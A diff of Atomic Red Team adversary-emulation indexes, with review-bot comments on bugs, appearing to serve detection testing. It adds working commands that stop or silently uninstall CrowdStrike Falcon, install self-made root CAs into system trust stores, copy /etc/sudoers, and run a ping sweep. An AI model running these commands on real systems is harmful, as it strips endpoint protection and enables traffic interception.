@@ -23,18 +23,19 @@ defense-evasion,T1038,DLL Search Order Hijacking,1,DLL Search Order Hijacking -
 defense-evasion,T1073,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode
-defense-evasion,T1089,Disabling Security Tools,8,Unload Sysmon Filter Driver
-defense-evasion,T1089,Disabling Security Tools,9,Disable Windows IIS HTTP Logging
-defense-evasion,T1089,Disabling Security Tools,10,Uninstall Sysmon
-defense-evasion,T1089,Disabling Security Tools,11,AMSI Bypass - AMSI InitFailed
-defense-evasion,T1089,Disabling Security Tools,12,AMSI Bypass - Remove AMSI Provider Reg Key
-defense-evasion,T1089,Disabling Security Tools,13,Disable Arbitrary Security Windows Service
-defense-evasion,T1089,Disabling Security Tools,14,Tamper with Windows Defender ATP PowerShell
-defense-evasion,T1089,Disabling Security Tools,15,Tamper with Windows Defender Command Prompt
-defense-evasion,T1089,Disabling Security Tools,16,Tamper with Windows Defender Registry
-defense-evasion,T1089,Disabling Security Tools,17,Disable Microft Office Security Features
-defense-evasion,T1089,Disabling Security Tools,18,Remove Windows Defender Definition Files
-defense-evasion,T1089,Disabling Security Tools,19,Stop and Remove Arbitrary Security Windows Service
+defense-evasion,T1089,Disabling Security Tools,10,Unload Sysmon Filter Driver
+defense-evasion,T1089,Disabling Security Tools,11,Disable Windows IIS HTTP Logging
+defense-evasion,T1089,Disabling Security Tools,12,Uninstall Sysmon
+defense-evasion,T1089,Disabling Security Tools,13,AMSI Bypass - AMSI InitFailed
+defense-evasion,T1089,Disabling Security Tools,14,AMSI Bypass - Remove AMSI Provider Reg Key
+defense-evasion,T1089,Disabling Security Tools,15,Disable Arbitrary Security Windows Service
+defense-evasion,T1089,Disabling Security Tools,16,Tamper with Windows Defender ATP PowerShell
+defense-evasion,T1089,Disabling Security Tools,17,Tamper with Windows Defender Command Prompt
+defense-evasion,T1089,Disabling Security Tools,18,Tamper with Windows Defender Registry
+defense-evasion,T1089,Disabling Security Tools,19,Disable Microft Office Security Features
+defense-evasion,T1089,Disabling Security Tools,20,Remove Windows Defender Definition Files
+defense-evasion,T1089,Disabling Security Tools,21,Stop and Remove Arbitrary Security Windows Service
+defense-evasion,T1089,Disabling Security Tools,22,Uninstall Crowdstrike Falcon on Windows
 defense-evasion,T1107,File Deletion,4,Delete a single file - Windows cmd
 defense-evasion,T1107,File Deletion,5,Delete an entire folder - Windows cmd
 defense-evasion,T1107,File Deletion,6,Delete a single file - Windows PowerShell
@@ -57,6 +58,7 @@ defense-evasion,T1070,Indicator Removal on Host,6,Delete System Logs Using Power
 defense-evasion,T1070,Indicator Removal on Host,7,Delete System Logs Using Clear-EventLogId
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe
 defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe
+defense-evasion,T1130,Install Root Certificate,4,Install root CA on Windows
 defense-evasion,T1118,InstallUtil,1,CheckIfInstallable method call
 defense-evasion,T1118,InstallUtil,2,InstallHelper method call
 defense-evasion,T1118,InstallUtil,3,InstallUtil class constructor method call
@@ -266,7 +268,7 @@ discovery,T1518,Software Discovery,2,Applications Installed
 discovery,T1082,System Information Discovery,1,System Information Discovery
 discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows)
 discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery
-discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery
+discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows
 discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules
 discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style)
 discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index af2c8d00..c54906b6 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -206,21 +206,24 @@ - Atomic Test #2: Disable syslog [linux] - Atomic Test #3: Disable Cb Response [linux] - Atomic Test #4: Disable SELinux [linux] - - Atomic Test #5: Disable Carbon Black Response [macos] - - Atomic Test #6: Disable LittleSnitch [macos] - - Atomic Test #7: Disable OpenDNS Umbrella [macos] - - Atomic Test #8: Unload Sysmon Filter Driver [windows] - - Atomic Test #9: Disable Windows IIS HTTP Logging [windows] - - Atomic Test #10: Uninstall Sysmon [windows] - - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows] - - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows] - - Atomic Test #13: Disable Arbitrary Security Windows Service [windows] - - Atomic Test #14: Tamper with Windows Defender ATP PowerShell [windows] - - Atomic Test #15: Tamper with Windows Defender Command Prompt [windows] - - Atomic Test #16: Tamper with Windows Defender Registry [windows] - - Atomic Test #17: Disable Microft Office Security Features [windows] - - Atomic Test #18: Remove Windows Defender Definition Files [windows] - - Atomic Test #19: Stop and Remove Arbitrary Security Windows Service [windows] + - Atomic Test #5: Stop Crowdstrike Falcon on Linux [linux] + - Atomic Test #6: Disable Carbon Black Response [macos] + - Atomic Test #7: Disable LittleSnitch [macos] + - Atomic Test #8: Disable OpenDNS Umbrella [macos] + - Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos] + - Atomic Test #10: Unload Sysmon Filter Driver [windows] + - Atomic Test #11: Disable Windows IIS HTTP Logging [windows] + - Atomic Test #12: Uninstall Sysmon [windows] + - Atomic Test #13: AMSI Bypass - AMSI InitFailed [windows] + - Atomic Test #14: AMSI Bypass - Remove AMSI Provider Reg Key [windows] + - Atomic Test #15: Disable Arbitrary Security Windows Service [windows] + - Atomic Test #16: Tamper with Windows Defender ATP PowerShell [windows] + - Atomic Test #17: Tamper with Windows Defender Command Prompt [windows] + - Atomic Test #18: Tamper with Windows 
Defender Registry [windows] + - Atomic Test #19: Disable Microft Office Security Features [windows] + - Atomic Test #20: Remove Windows Defender Definition Files [windows] + - Atomic Test #21: Stop and Remove Arbitrary Security Windows Service [windows] + - Atomic Test #22: Uninstall Crowdstrike Falcon on Windows [windows] - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -287,6 +290,9 @@ - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows] - [T1130 Install Root Certificate](../../T1130/T1130.md) - Atomic Test #1: Install root CA on CentOS/RHEL [linux] + - Atomic Test #2: Install root CA on Debian/Ubuntu [linux] + - Atomic Test #3: Install root CA on macOS [macos] + - Atomic Test #4: Install root CA on Windows [windows] - [T1118 InstallUtil](../../T1118/T1118.md) - Atomic Test #1: CheckIfInstallable method call [windows] - Atomic Test #2: InstallHelper method call [windows] @@ -612,7 +618,7 @@ - Atomic Test #2: Applications Installed [windows] - [T1082 System Information Discovery](../../T1082/T1082.md) - Atomic Test #1: System Information Discovery [windows] - - Atomic Test #2: System Information Discovery [linux, macos] + - Atomic Test #2: System Information Discovery [macos] - Atomic Test #3: List OS Information [linux, macos] - Atomic Test #4: Linux VM Check via Hardware [linux] - Atomic Test #5: Linux VM Check via Kernel Modules [linux] 
@@ -620,7 +626,7 @@ - Atomic Test #7: Hostname Discovery [linux, macos] - Atomic Test #8: Windows MachineGUID Discovery [windows] - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - - Atomic Test #1: System Network Configuration Discovery [windows] + - Atomic Test #1: System Network Configuration Discovery on Windows [windows] - Atomic Test #2: List Windows Firewall Rules [windows] - Atomic Test #3: System Network Configuration Discovery [macos, linux] - Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index f25248cb..e4988db8 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -98,7 +98,6 @@ - Atomic Test #7: Remote System Discovery - sweep [linux, macos] - [T1518 Software Discovery](../../T1518/T1518.md) - [T1082 System Information Discovery](../../T1082/T1082.md) - - Atomic Test #2: System Information Discovery [linux, macos] - Atomic Test #3: List OS Information [linux, macos] - Atomic Test #4: Linux VM Check via Hardware [linux] - Atomic Test #5: Linux VM Check via Kernel Modules [linux] @@ -151,6 +150,7 @@ - Atomic Test #2: Disable syslog [linux] - Atomic Test #3: Disable Cb Response [linux] - Atomic Test #4: Disable SELinux [linux] + - Atomic Test #5: Stop Crowdstrike Falcon on Linux [linux] - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1107 File Deletion](../../T1107/T1107.md) 
@@ -180,6 +180,7 @@ - Atomic Test #5: Overwrite Linux Log [linux] - [T1130 Install Root Certificate](../../T1130/T1130.md) - Atomic Test #1: Install root CA on CentOS/RHEL [linux] + - Atomic Test #2: Install root CA on Debian/Ubuntu [linux] - [T1036 Masquerading](../../T1036/T1036.md) - Atomic Test #2: Masquerading as Linux crond process. [linux] - [T1027 Obfuscated Files or Information](../../T1027/T1027.md) diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index c223b80e..c015b6ec 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -111,7 +111,7 @@ - Atomic Test #3: Security Software Discovery - ps [linux, macos] - [T1518 Software Discovery](../../T1518/T1518.md) - [T1082 System Information Discovery](../../T1082/T1082.md) - - Atomic Test #2: System Information Discovery [linux, macos] + - Atomic Test #2: System Information Discovery [macos] - Atomic Test #3: List OS Information [linux, macos] - Atomic Test #7: Hostname Discovery [linux, macos] - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) @@ -240,9 +240,10 @@ - [T1090 Connection Proxy](../../T1090/T1090.md) - Atomic Test #1: Connection Proxy [macos, linux] - [T1089 Disabling Security Tools](../../T1089/T1089.md) - - Atomic Test #5: Disable Carbon Black Response [macos] - - Atomic Test #6: Disable LittleSnitch [macos] - - Atomic Test #7: Disable OpenDNS Umbrella [macos] + - Atomic Test #6: Disable Carbon Black Response [macos] + - Atomic Test #7: Disable LittleSnitch [macos] + - Atomic Test #8: Disable OpenDNS Umbrella [macos] + - Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos] - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1107 File Deletion](../../T1107/T1107.md) 
@@ -276,6 +277,7 @@ - [T1070 Indicator Removal on Host](../../T1070/T1070.md) - Atomic Test #3: rm -rf [macos, linux] - [T1130 Install Root Certificate](../../T1130/T1130.md) + - Atomic Test #3: Install root CA on macOS [macos] - T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1152 Launchctl](../../T1152/T1152.md) - Atomic Test #1: Launchctl [macos] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 1983d0ad..45f41ede 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -41,18 +41,19 @@ - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows] - Atomic Test #2: Certutil Rename and Decode [windows] - [T1089 Disabling Security Tools](../../T1089/T1089.md) - - Atomic Test #8: Unload Sysmon Filter Driver [windows] - - Atomic Test #9: Disable Windows IIS HTTP Logging [windows] - - Atomic Test #10: Uninstall Sysmon [windows] - - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows] - - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows] - - Atomic Test #13: Disable Arbitrary Security Windows Service [windows] - - Atomic Test #14: Tamper with Windows Defender ATP PowerShell [windows] - - Atomic Test #15: Tamper with Windows Defender Command Prompt [windows] - - Atomic Test #16: Tamper with Windows Defender Registry [windows] - - Atomic Test #17: Disable Microft Office Security Features [windows] - - Atomic Test #18: Remove Windows Defender Definition Files [windows] - - Atomic Test #19: Stop and Remove Arbitrary Security Windows Service [windows] + - Atomic Test #10: Unload Sysmon Filter Driver [windows] + - Atomic Test #11: Disable Windows IIS HTTP Logging [windows] + - Atomic Test #12: Uninstall Sysmon [windows] + - Atomic Test #13: AMSI Bypass - AMSI InitFailed [windows] + - Atomic Test #14: AMSI Bypass - Remove AMSI Provider Reg Key [windows] + - Atomic Test #15: Disable Arbitrary Security Windows Service [windows] + - Atomic Test #16: Tamper with Windows Defender ATP PowerShell [windows] + - Atomic Test #17: Tamper with Windows Defender Command Prompt [windows] + - Atomic Test #18: Tamper with Windows Defender Registry [windows] + - Atomic Test #19: Disable Microft Office Security Features [windows] + - Atomic Test #20: Remove Windows Defender Definition Files [windows] + - Atomic Test #21: Stop and Remove Arbitrary Security Windows Service [windows] + - Atomic Test #22: Uninstall Crowdstrike Falcon on Windows [windows] - T1480 Execution Guardrails [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -90,6 +91,7 @@ - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows] - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows] - [T1130 Install Root Certificate](../../T1130/T1130.md) + - Atomic Test #4: Install root CA on Windows [windows] - [T1118 InstallUtil](../../T1118/T1118.md) - Atomic Test #1: CheckIfInstallable method call [windows] - Atomic Test #2: InstallHelper method call [windows] @@ -436,7 +438,7 @@ - Atomic Test #6: Hostname Discovery (Windows) [windows] - Atomic Test #8: Windows MachineGUID Discovery [windows] - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - - Atomic Test #1: System Network Configuration Discovery [windows] + - Atomic Test #1: System Network Configuration Discovery on Windows [windows] - Atomic Test #2: List Windows Firewall Rules [windows] - Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows] - Atomic Test #5: List Open Egress Ports [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 591668e0..a98c0dc4 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -7399,6 +7399,21 @@ defense-evasion: command: 'setenforce 0 ' + - name: Stop Crowdstrike Falcon on Linux + description: 'Stop and disable Crowdstrike Falcon on Linux + +' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: | + sudo systemctl stop falcon-sensor.service + sudo systemctl disable falcon-sensor.service + cleanup_command: | + sudo systemctl enable falcon-sensor.service + sudo systemctl start falcon-sensor.service - name: Disable Carbon Black Response description: 'Disables Carbon Black Response 
@@ -7432,6 +7447,28 @@ defense-evasion: command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist ' + - name: Stop and unload Crowdstrike Falcon on macOS + description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon + on macOS + +' + supported_platforms: + - macos + input_arguments: + falcond_plist: + description: The path of the Crowdstrike Falcon plist file + type: path + default: "/Library/LaunchDaemons/com.crowdstrike.falcond.plist" + userdaemon_plist: + description: The path of the Crowdstrike Userdaemon plist file + type: path + default: "/Library/LaunchDaemons/com.crowdstrike.userdaemon.plist" + executor: + name: sh + elevation_required: true + command: | + sudo launchctl unload #{falcond_plist} + sudo launchctl unload #{userdaemon_plist} - name: Unload Sysmon Filter Driver description: | Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, 
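Review bot: The new `Stop and unload Crowdstrike Falcon on macOS` test has no `cleanup_command`, so both daemons stay unloaded after the test runs, whereas the Linux test added in the previous hunk re-enables and restarts its service in cleanup. Add the symmetric restore, `cleanup_command: |` followed by `sudo launchctl load #{falcond_plist}` and `sudo launchctl load #{userdaemon_plist}`, so a detection-validation run does not leave the host unprotected. The arguments here use `type: path` while the root-CA tests later in this diff use `type: Path`; this index looks generated from the per-technique YAML, so both the cleanup and the casing belong in the T1089 source.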
@@ -7700,9 +7737,31 @@ defense-evasion: executor: name: powershell elevation_required: true - command: |- + command: | Stop-Service -Name #{service_name} Remove-Service -Name #{service_name} + - name: Uninstall Crowdstrike Falcon on Windows + description: 'Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is + not provided as an argument we need to search for it. Since the executable + is located in a folder named with a random guid we need to identify it before + invoking the uninstaller. + +' + supported_platforms: + - windows + input_arguments: + falcond_path: + description: The Crowdstrike Windows Sensor path. The Guid always changes. + type: path + default: C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe + executor: + name: powershell + elevation_required: true + command: if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall + /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include + "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath + $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList + -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}} T1107: technique: x_mitre_data_sources: @@ -9416,7 +9475,7 @@ defense-evasion: name: sh command: | openssl genrsa -out #{key_filename} 4096 - openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename} + openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -le "5" ]; then 
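Review bot: The `falcond_path` argument of the new `Uninstall Crowdstrike Falcon on Windows` test is described as `The Guid always changes` while its default hard-codes one specific GUID, so a reader cannot tell whether the default is expected to resolve or is only an example that the signed-binary search in the executor covers. Suggest `description: Path to WindowsSensor.exe. The Package Cache GUID differs per install, so this default is an example; when it does not exist the executor searches the cache for a CrowdStrike-signed copy.` The name also borrows the `falcond` daemon name used by the Linux and macOS tests although this one targets WindowsSensor.exe, so `windows_sensor_path` would read better, and because the test has no `cleanup_command` the description should state that the sensor must be reinstalled manually afterwards.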
@@ -9425,6 +9484,93 @@ defense-evasion: cp rootCA.crt /etc/pki/ca-trust/source/anchors/ update-ca-trust fi + - name: Install root CA on Debian/Ubuntu + description: 'Creates a root CA with openssl + +' + supported_platforms: + - linux + input_arguments: + key_filename: + description: Key we create that is used to create the CA certificate + type: Path + default: rootCA.key + cert_filename: + description: CA file name + type: Path + default: rootCA.crt + dependency_executor_name: command_prompt + dependencies: + - description: Verify the certificate exists. It generates if not on disk. + prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;' + get_prereq_command: |- + if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; + openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} + executor: + name: sh + elevation_required: true + command: | + mv #{cert_filename} /usr/local/share/ca-certificates + echo sudo update-ca-certificates + - name: Install root CA on macOS + description: 'Creates a root CA with openssl + +' + supported_platforms: + - macos + input_arguments: + key_filename: + description: Key we create that is used to create the CA certificate + type: Path + default: rootCA.key + cert_filename: + description: CA file name + type: Path + default: rootCA.crt + dependency_executor_name: command_prompt + dependencies: + - description: Verify the certificate exists. It generates if not on disk. + prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;' + get_prereq_command: |- + if [ ! 
-f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; + openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} + executor: + name: command_prompt + elevation_required: true + command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" + "#{cert_filename}" + +' + - name: Install root CA on Windows + description: 'Creates a root CA with Powershell + +' + supported_platforms: + - windows + input_arguments: + pfx_path: + description: Path of the certificate + type: Path + default: rootCA.cer + dependency_executor_name: powershell + dependencies: + - description: Verify the certificate exists. It generates if not on disk. + prereq_command: 'if (Test-Path #{cert_filename}) { exit 0 } else { exit 1 + }' + get_prereq_command: |- + $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My + Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$cert.Thumbprint -FilePath #{pfx_path} + Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item + executor: + name: command_prompt + elevation_required: true + command: | + $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My + Move-Item -Path $cert.PSPath -Destination "Cert:\LocalMachine\Root" + cleanup_command: | + $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My + Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item + Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) | Remove-Item T1118: technique: x_mitre_data_sources: 
@@ -17493,10 +17639,13 @@ discovery: output_file: description: Path where captured results will be placed type: Path - default: "~/loot.txt" + default: "/tmp/T1087.txt" executor: name: sh - command: 'cat /etc/passwd > #{output_file} + command: | + cat /etc/passwd > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} ' - name: View sudoers access @@ -17508,10 +17657,14 @@ discovery: output_file: description: Path where captured results will be placed type: Path - default: "~/loot.txt" + default: "/tmp/T1087.txt" executor: name: sh - command: 'cat /etc/sudoers > #{output_file} + elevation_required: true + command: | + cat /etc/sudoers > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} ' - name: View accounts with UID 0 @@ -17525,10 +17678,13 @@ discovery: output_file: description: Path where captured results will be placed type: Path - default: "~/loot.txt" + default: "/tmp/T1087.txt" executor: name: sh - command: 'grep ''x:0:'' /etc/passwd > #{output_file} + command: | + grep 'x:0:' /etc/passwd > #{output_file} + cat #{output_file} 2>/dev/null + cleanup_command: 'rm -f #{output_file} 2>/dev/null ' - name: List opened files by user @@ -17553,10 +17709,20 @@ discovery: output_file: description: Path where captured results will be placed type: Path - default: "~/loot.txt" + default: "/tmp/T1087.txt" + dependency_executor_name: sh + dependencies: + - description: Check if lastlog command exists on the machine + prereq_command: if [ -x "$(command -v lastlog)" ]; then exit 0; else exit + 1; + get_prereq_command: echo "Install lastlog on the machine to run the test."; + exit 1; executor: name: sh - command: 'lastlog > #{output_file} + command: | + lastlog > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} ' - name: Enumerate users and groups 
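Review bot: The new lastlog prerequisite in the `@@ -17553` hunk ends `then exit 0; else exit 1;` with no closing `fi`, so the shell rejects the check with a syntax error and the test is reported as missing its prerequisite even when `lastlog` is installed. The same truncated `if` appears in the nmap, arp and netstat prerequisites added in later hunks of this diff, while the T1130 prerequisite in the same commit shows the correct form `'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;'`. Change each to `prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; fi;'` with the respective command name. The way these plain scalars are folded across lines suggests the index was regenerated from the technique YAML, where the fix should be made.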
@@ -17768,10 +17934,17 @@ discovery: ' supported_platforms: - linux + input_arguments: + output_file: + description: Path where captured results will be placed. + type: Path + default: "/tmp/T1217-Firefox.txt" executor: name: sh - command: 'find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >> - /tmp/firefox-bookmarks.txt \; + command: | + find / -path "*.mozilla/firefox/*/places.sqlite" 2>/dev/null -exec echo {} >> #{output_file} \; + cat #{output_file} 2>/dev/null + cleanup_command: 'rm -f #{output_file} 2>/dev/null ' - name: List Mozilla Firefox Bookmark Database Files on macOS @@ -17781,10 +17954,17 @@ discovery: ' supported_platforms: - macos + input_arguments: + output_file: + description: Path where captured results will be placed. + type: Path + default: "/tmp/T1217_Firefox.txt" executor: name: sh - command: 'find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} - >> /tmp/firefox-bookmarks.txt \; + command: | + find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> #{output_file} \; + cat #{output_file} 2>/dev/null + cleanup_command: 'rm -f #{output_file} 2>/dev/null ' - name: List Google Chrome Bookmark JSON Files on macOS @@ -17794,10 +17974,17 @@ discovery: ' supported_platforms: - macos + input_arguments: + output_file: + description: Path where captured results will be placed. + type: Path + default: "/tmp/T1217-Chrome.txt" executor: name: sh - command: 'find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> /tmp/chrome-bookmarks.txt - \; + command: | + find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> #{output_file} \; + cat #{output_file} 2>/dev/null + cleanup_command: 'rm -f #{output_file} 2>/dev/null ' - name: List Google Chrome Bookmarks on Windows with powershell 
@@ -18150,16 +18337,25 @@ discovery: supported_platforms: - macos - linux + input_arguments: + output_file: + description: Output file used to store the results. + type: path + default: "/tmp/T1083.txt" executor: name: sh command: | - ls -a > allcontents.txt - ls -la /Library/Preferences/ > detailedprefsinfo.txt - file */* *>> ../files.txt + ls -a >> #{output_file} + if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > #{output_file}; fi; + file */* *>> #{output_file} + cat #{output_file} 2>/dev/null find . -type f ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/' locate * which sh + cleanup_command: 'rm #{output_file} + +' - name: Nix File and Directory Discovery 2 description: 'Find or discover files on the file system @@ -18167,13 +18363,20 @@ discovery: supported_platforms: - macos - linux + input_arguments: + output_file: + description: Output file used to store the results. + type: path + default: "/tmp/T1083.txt" executor: name: sh command: | - cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt - cat /etc/mtab > /tmp/loot.txt - find . -type f -iname *.pdf > /tmp/loot.txt + cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file} + if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi; + find . -type f -iname *.pdf >> #{output_file} + cat #{output_file}; fi; find . -type f -name ".*" + cleanup_command: 'rm #{output_file}' T1046: technique: x_mitre_permissions_required: @@ -18265,6 +18468,12 @@ discovery: description: Host to scan. type: string default: 192.168.1.1 + dependency_executor_name: sh + dependencies: + - description: Check if nmap command exists on the machine + prereq_command: if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; + get_prereq_command: echo "Install nmap on the machine to run the test."; exit + 1; executor: name: sh command: | 
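Review bot: In `Nix File and Directory Discovery` the new line `if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > #{output_file}; fi;` uses `>` where every other line appends with `>>`, so on macOS it truncates the file and discards the `ls -a` output captured one line earlier. Change it to `if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ >> #{output_file}; fi;`. The rewritten `file */* *>> #{output_file}` line still has the redirection glued to the glob; sh parses it as `*` followed by `>>`, so it works, but `file */* * >> #{output_file}` would make the intent explicit.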
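Review bot: The new line `cat #{output_file}; fi;` in `Nix File and Directory Discovery 2` contains a `fi` with no matching `if`, which is a syntax error in sh, so the final `find . -type f -name ".*"` never runs and the test fails on both supported platforms. Drop the stray token: `cat #{output_file}`. The preceding `if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi;` is well-formed, which suggests the `fi;` was pasted one line too far.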
@@ -18772,9 +18981,9 @@ discovery: executor: name: sh command: | - dscacheutil -q group - dscl . -list /Groups - groups + if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; fi; + if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi; + if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi; - name: Basic Permission Groups Discovery Windows description: | Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain @@ -19134,6 +19343,11 @@ discovery: supported_platforms: - linux - macos + dependency_executor_name: sh + dependencies: + - description: Check if arp command exists on the machine + prereq_command: if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; + get_prereq_command: echo "Install arp on the machine."; exit 1; executor: name: sh elevation_required: false @@ -19147,11 +19361,24 @@ discovery: supported_platforms: - linux - macos + input_arguments: + subnet: + description: Subnet used for ping sweep. + type: string + default: 192.168.1 + start_host: + description: Subnet used for ping sweep. + type: string + default: 1 + stop_host: + description: Subnet used for ping sweep. + type: string + default: 254 executor: name: sh elevation_required: false - command: 'for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] - && echo "192.168.1.$ip UP" || : ; done + command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; + [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done ' - name: Remote System Discovery - nslookup @@ -19452,12 +19679,10 @@ discovery: ' supported_platforms: - - linux - macos executor: name: sh command: | - systemsetup system_profiler ls -al /Applications - name: List OS Information 
